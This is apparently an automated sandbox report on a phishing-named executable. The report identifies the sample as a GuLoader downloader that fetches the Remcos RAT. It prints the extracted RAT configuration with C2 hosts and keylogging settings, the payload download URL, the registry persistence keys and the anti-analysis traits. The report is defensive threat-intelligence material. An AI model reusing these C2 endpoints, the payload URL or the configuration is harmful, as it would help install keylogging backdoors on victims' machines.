Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order No.5817-0001142025.bat.exe

Overview

General Information

Sample name:Purchase Order No.5817-0001142025.bat.exe
Analysis ID:1592409
MD5:fb2be2965fb21d400341518012ad4867
SHA1:fda727494d927e9b5919ca2b32f71a1d479f540c
SHA256:93e42636e6f59d02d0a756054fdadc37644c1c32da55cda0185e7923a8e42126
Tags:batexeuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["linktreewealth.zapto.org:3980:0", "linktreewealth.zapto.org:3981:1", "linktreewealthy.zapto.org:3980:0"], "Assigned name": "Manifest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0B1XIG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000004.00000002.3324734721.0000000006502000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000002.3324633416.00000000064D6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000000.00000002.3095281637.00000000030B6000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: Purchase Order No.5817-0001142025.bat.exe PID: 6720JoeSecurity_RemcosYara detected Remcos RATJoe Security

            System Summary

            barindex
            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Burrower\Emotionalizes.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe, ProcessId: 6720, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\jezebelish
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Burrower\Emotionalizes.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe, ProcessId: 6720, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\jezebelish

            Stealing of Sensitive Information

            barindex
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe, ProcessId: 6720, TargetFilename: C:\ProgramData\remcos\logs.dat
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-16T05:12:00.888974+010028032702Potentially Bad Traffic192.168.2.549974109.99.162.14443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000004.00000002.3324633416.00000000064D6000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["linktreewealth.zapto.org:3980:0", "linktreewealth.zapto.org:3981:1", "linktreewealthy.zapto.org:3980:0"], "Assigned name": "Manifest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0B1XIG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
            Source: C:\Users\user\AppData\Local\Temp\Burrower\Emotionalizes.batReversingLabs: Detection: 60%
            Source: Purchase Order No.5817-0001142025.bat.exeVirustotal: Detection: 36%Perma Link
            Source: Purchase Order No.5817-0001142025.bat.exeReversingLabs: Detection: 60%
            Source: Yara matchFile source: 00000004.00000002.3324734721.0000000006502000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3324633416.00000000064D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase Order No.5817-0001142025.bat.exe PID: 6720, type: MEMORYSTR
            Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Purchase Order No.5817-0001142025.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 109.99.162.14:443 -> 192.168.2.5:49974 version: TLS 1.2
            Source: Purchase Order No.5817-0001142025.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: mshtml.pdb source: Purchase Order No.5817-0001142025.bat.exe, 00000004.00000001.3093242051.0000000000649000.00000020.00000001.01000000.00000007.sdmp
            Source: Binary string: mshtml.pdbUGP source: Purchase Order No.5817-0001142025.bat.exe, 00000004.00000001.3093242051.0000000000649000.00000020.00000001.01000000.00000007.sdmp
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeCode function: 0_2_004069DF FindFirstFileW,FindClose,0_2_004069DF
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeCode function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D8E
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910

            Networking

            barindex
            Source: Malware configuration extractorURLs: linktreewealth.zapto.org
            Source: Malware configuration extractorURLs: linktreewealth.zapto.org
            Source: Malware configuration extractorURLs: linktreewealthy.zapto.org
            Source: Joe Sandbox ViewIP Address: 109.99.162.14 109.99.162.14
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49974 -> 109.99.162.14:443
            Source: global trafficHTTP traffic detected: GET /NJrdZqNcCtz102.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /NJrdZqNcCtz102.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: teldrum.ro
            Source: global trafficDNS traffic detected: DNS query: linktreewealth.zapto.org
            Source: global trafficDNS traffic detected: DNS query: linktreewealthy.zapto.org
            Source: Purchase Order No.5817-0001142025.bat.exe, Emotionalizes.bat.4.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Purchase Order No.5817-0001142025.bat.exe, 00000004.00000001.3093242051.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
            Source: Purchase Order No.5817-0001142025.bat.exe, 00000004.00000001.3093242051.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
            Source: Purchase Order No.5817-0001142025.bat.exe, 00000004.00000001.3093242051.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
            Source: Purchase Order No.5817-0001142025.bat.exe, 00000004.00000001.3093242051.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
            Source: Purchase Order No.5817-0001142025.bat.exe, 00000004.00000002.3324633416.0000000006498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/
            Source: Purchase Order No.5817-0001142025.bat.exe, 00000004.00000002.3324633416.00000000064D6000.00000004.00000020.00020000.00000000.sdmp, Purchase Order No.5817-0001142025.bat.exe, 00000004.00000002.3324633416.0000000006498000.00000004.00000020.00020000.00000000.sdmp, Purchase Order No.5817-0001142025.bat.exe, 00000004.00000002.3324792828.0000000006720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bin
            Source: Purchase Order No.5817-0001142025.bat.exe, 00000004.00000002.3324633416.0000000006498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bin(
            Source: Purchase Order No.5817-0001142025.bat.exe, 00000004.00000002.3324792828.0000000006720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.binFysisNoncrestereamuschilor.ro/NJrdZqNcCtz102.bin
            Source: Purchase Order No.5817-0001142025.bat.exe, 00000004.00000002.3324633416.00000000064D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bintX
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
            Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
            Source: unknownHTTPS traffic detected: 109.99.162.14:443 -> 192.168.2.5:49974 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeCode function: 0_2_00405846 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405846

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 00000004.00000002.3324734721.0000000006502000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3324633416.00000000064D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase Order No.5817-0001142025.bat.exe PID: 6720, type: MEMORYSTR
            Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: Purchase Order No.5817-0001142025.bat.exe
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeCode function: 0_2_00406DA00_2_00406DA0
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeCode function: 0_2_6FBB1BFF0_2_6FBB1BFF
            Source: Purchase Order No.5817-0001142025.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/10@3/1
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeCode function: 0_2_00404AF2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AF2
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeCode function: 0_2_004021AF CoCreateInstance,0_2_004021AF
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeFile created: C:\Users\user\eftermodnendesJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-0B1XIG
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsq89CE.tmpJump to behavior
            Source: Purchase Order No.5817-0001142025.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Purchase Order No.5817-0001142025.bat.exeVirustotal: Detection: 36%
            Source: Purchase Order No.5817-0001142025.bat.exeReversingLabs: Detection: 60%
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeFile read: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe "C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe"
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeProcess created: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe "C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe"
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeProcess created: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe "C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeFile written: C:\Users\user\AppData\Local\Temp\Setup.iniJump to behavior
            Source: Purchase Order No.5817-0001142025.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: mshtml.pdb source: Purchase Order No.5817-0001142025.bat.exe, 00000004.00000001.3093242051.0000000000649000.00000020.00000001.01000000.00000007.sdmp
            Source: Binary string: mshtml.pdbUGP source: Purchase Order No.5817-0001142025.bat.exe, 00000004.00000001.3093242051.0000000000649000.00000020.00000001.01000000.00000007.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.3095281637.00000000030B6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeCode function: 0_2_6FBB1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FBB1BFF
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeCode function: 0_2_6FBB30C0 push eax; ret 0_2_6FBB30EE
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeFile created: C:\Users\user\AppData\Local\Temp\Burrower\Emotionalizes.batJump to dropped file
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeFile created: C:\Users\user\AppData\Local\Temp\Burrower\Emotionalizes.batJump to dropped file
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce jezebelishJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce jezebelishJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce jezebelishJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce jezebelishJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeAPI/Special instruction interceptor: Address: 3409CC8
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeAPI/Special instruction interceptor: Address: 1B19CC8
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeRDTSC instruction interceptor: First address: 33C7816 second address: 33C7816 instructions: 0x00000000 rdtsc 0x00000002 cmp dx, bx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007FF2A1174A07h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeRDTSC instruction interceptor: First address: 1AD7816 second address: 1AD7816 instructions: 0x00000000 rdtsc 0x00000002 cmp dx, bx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007FF2A0D34217h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe TID: 2436Thread sleep count: 342 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeCode function: 0_2_004069DF FindFirstFileW,FindClose,0_2_004069DF
